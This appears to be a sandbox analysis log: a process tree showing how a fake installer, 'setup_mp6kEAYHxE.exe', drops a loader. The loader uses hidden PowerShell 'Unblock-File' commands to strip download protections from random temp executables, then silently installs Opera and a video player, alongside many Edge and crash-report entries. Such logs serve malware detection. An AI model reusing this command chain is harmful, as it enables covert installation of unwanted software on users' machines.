C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2804 /prefetch:82⤵PID:568
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:12⤵PID:4644
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:12⤵PID:4248
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:12⤵PID:1836
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:12⤵PID:1724
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2800 /prefetch:12⤵PID:112
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5352 /prefetch:12⤵PID:3924
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4492 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2164 -
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5724 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3580 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2480 /prefetch:12⤵PID:1596
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5932 /prefetch:12⤵PID:2248
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:12⤵PID:572
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:12⤵PID:3088
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4768 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:4716 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6476 /prefetch:12⤵PID:1432
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:12⤵PID:336
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5456 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4584 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4640 /prefetch:12⤵PID:4080
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:12⤵PID:2740
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6668 /prefetch:12⤵PID:1636
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7148 /prefetch:12⤵PID:3716
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaService --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=6800 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1516 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4612 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:1420
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3908
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2368
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3132
-
C:\Users\Admin\Desktop\setup_mp6kEAYHxE.exe"C:\Users\Admin\Desktop\setup_mp6kEAYHxE.exe"1⤵PID:4404
-
C:\Users\Admin\AppData\Local\Temp\is-54FQC.tmp\setup_mp6kEAYHxE.tmp"C:\Users\Admin\AppData\Local\Temp\is-54FQC.tmp\setup_mp6kEAYHxE.tmp" /SL5="$702DE,6120275,56832,C:\Users\Admin\Desktop\setup_mp6kEAYHxE.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:2664 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /F /TN "dj_minor_adequate_7161"3⤵PID:1648
-
C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe"C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe" 12c7d44288663dab807bf8727c2b03b53⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2768 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 8444⤵
- Program crash
PID:1420 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 8524⤵
- Program crash
PID:1716 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 9284⤵
- Program crash
PID:3716 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 10484⤵
- Program crash
PID:4448 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 10564⤵
- Program crash
PID:2060 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 10884⤵
- Program crash
PID:132 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 11324⤵
- Program crash
PID:3492 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 11444⤵
- Program crash
PID:4584 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 11284⤵
- Program crash
PID:1980 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 9684⤵
- Program crash
PID:4252 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 9404⤵
- Program crash
PID:888 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 13524⤵
- Program crash
PID:1364 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 15644⤵
- Program crash
PID:3968 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 11844⤵
- Program crash
PID:2164 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 16724⤵
- Program crash
PID:4712 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 18724⤵
- Program crash
PID:984 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 20524⤵
- Program crash
PID:4156 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://clck.ru/3Bsi4L4⤵PID:3692
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff81e303cb8,0x7ff81e303cc8,0x7ff81e303cd85⤵PID:4924
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 16444⤵
- Program crash
PID:3552 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 17964⤵
- Program crash
PID:2824 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 19684⤵
- Program crash
PID:3184 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 18524⤵
- Program crash
PID:5036 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 18444⤵
- Program crash
PID:1776 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 18404⤵
- Program crash
PID:3004 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 16524⤵
- Program crash
PID:2100 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 16444⤵
- Program crash
PID:1420 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 20764⤵
- Program crash
PID:4712 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 18524⤵
- Program crash
PID:2152 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 20884⤵
- Program crash
PID:2004 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 21244⤵
- Program crash
PID:1720 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 21204⤵
- Program crash
PID:1212 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 19204⤵
- Program crash
PID:4712 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 21324⤵
- Program crash
PID:2016 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 21244⤵
- Program crash
PID:2900 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\aW3SFbVV\AxnTxNXsNH.exe"4⤵PID:3660
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\aW3SFbVV\AxnTxNXsNH.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1856 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 21604⤵
- Program crash
PID:4928 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\OyqhYEWh\LPXAmkqoQNOEThly5U.exe"4⤵PID:3392
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\OyqhYEWh\LPXAmkqoQNOEThly5U.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2164 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 19684⤵
- Program crash
PID:2292 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 22004⤵
- Program crash
PID:2028 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\Aa7IDT2z\1nudJF05xlZjfK8yyP.exe"4⤵PID:2256
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\Aa7IDT2z\1nudJF05xlZjfK8yyP.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4748 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 22044⤵
- Program crash
PID:2600 -
C:\Users\Admin\AppData\Local\Temp\OyqhYEWh\LPXAmkqoQNOEThly5U.exeC:\Users\Admin\AppData\Local\Temp\OyqhYEWh\LPXAmkqoQNOEThly5U.exe --silent --allusers=04⤵
- Executes dropped EXE
PID:4688 -
C:\Users\Admin\AppData\Local\Temp\7zS05233879\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS05233879\setup.exe --silent --allusers=0 --server-tracking-blob=OGM2ZGVlZDFmY2UyNDcxNWVmYWI1ZWU0ZjhjZGUxOTBiYmE0M2ZjNWM0OWFhNzc5MTU3Y2YwZjU2MGI5YWM5Mjp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInRpbWVzdGFtcCI6IjE3MjExMDY3ODMuNTEzMCIsInVzZXJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMTguMC4wLjAgU2FmYXJpLzUzNy4zNiIsInV0bSI6eyJjYW1wYWlnbiI6Im9wMTMyIiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoiUlNUUCJ9LCJ1dWlkIjoiNzE1OGQzOTAtNWRkMC00MTI1LTkwMmUtNmNkYjJiZTQ1MWY2In0=5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
PID:4808 -
C:\Users\Admin\AppData\Local\Temp\7zS05233879\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS05233879\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x32c,0x330,0x334,0x308,0x338,0x6e3eb1f4,0x6e3eb200,0x6e3eb20c6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3060 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3452 -
C:\Users\Admin\AppData\Local\Temp\7zS05233879\setup.exe"C:\Users\Admin\AppData\Local\Temp\7zS05233879\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4808 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240716051312" --session-guid=2e9feb41-fadc-440a-88db-4f2d6d5a776b --server-tracking-blob=NGU4ZjBjZTgxNTM1ZTFhZmQ2MDAyY2M0YmVjODhkOGUxZGU3YjdlODc2Mjc0YjdmNzM5YTZmYTE3M2FmYzliNzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjExIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcyMTEwNjc4My41MTMwIiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExOC4wLjAuMCBTYWZhcmkvNTM3LjM2IiwidXRtIjp7ImNhbXBhaWduIjoib3AxMzIiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJSU1RQIn0sInV1aWQiOiI3MTU4ZDM5MC01ZGQwLTQxMjUtOTAyZS02Y2RiMmJlNDUxZjYifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=C4040000000000006⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:564 -
C:\Users\Admin\AppData\Local\Temp\7zS05233879\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS05233879\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x338,0x33c,0x340,0x308,0x344,0x6d60b1f4,0x6d60b200,0x6d60b20c7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4708 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160513121\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160513121\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe"6⤵
- Executes dropped EXE
PID:5548 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160513121\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160513121\assistant\assistant_installer.exe" --version6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5756 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160513121\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160513121\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=111.0.5168.25 --initial-client-data=0x250,0x254,0x258,0x22c,0x25c,0x1159f88,0x1159f94,0x1159fa07⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5532 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 19484⤵
- Program crash
PID:4844 -
C:\Users\Admin\AppData\Local\Temp\aW3SFbVV\AxnTxNXsNH.exeC:\Users\Admin\AppData\Local\Temp\aW3SFbVV\AxnTxNXsNH.exe4⤵
- Executes dropped EXE
PID:2456 -
C:\Users\Admin\AppData\Local\Temp\is-CMO7U.tmp\AxnTxNXsNH.tmp"C:\Users\Admin\AppData\Local\Temp\is-CMO7U.tmp\AxnTxNXsNH.tmp" /SL5="$30382,4415326,54272,C:\Users\Admin\AppData\Local\Temp\aW3SFbVV\AxnTxNXsNH.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:2020 -
C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe"C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe" -i6⤵
- Executes dropped EXE
PID:4680 -
C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe"C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe" -s6⤵
- Executes dropped EXE
PID:4796 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 22004⤵
- Program crash
PID:1904 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\LPL9xJBa\HrDttahkOdAABIRdJv.exe"4⤵PID:5164
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\LPL9xJBa\HrDttahkOdAABIRdJv.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5372 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 19484⤵
- Program crash
PID:5448 -
C:\Users\Admin\AppData\Local\Temp\Aa7IDT2z\1nudJF05xlZjfK8yyP.exeC:\Users\Admin\AppData\Local\Temp\Aa7IDT2z\1nudJF05xlZjfK8yyP.exe /sid=3 /pid=10904⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:5564 -
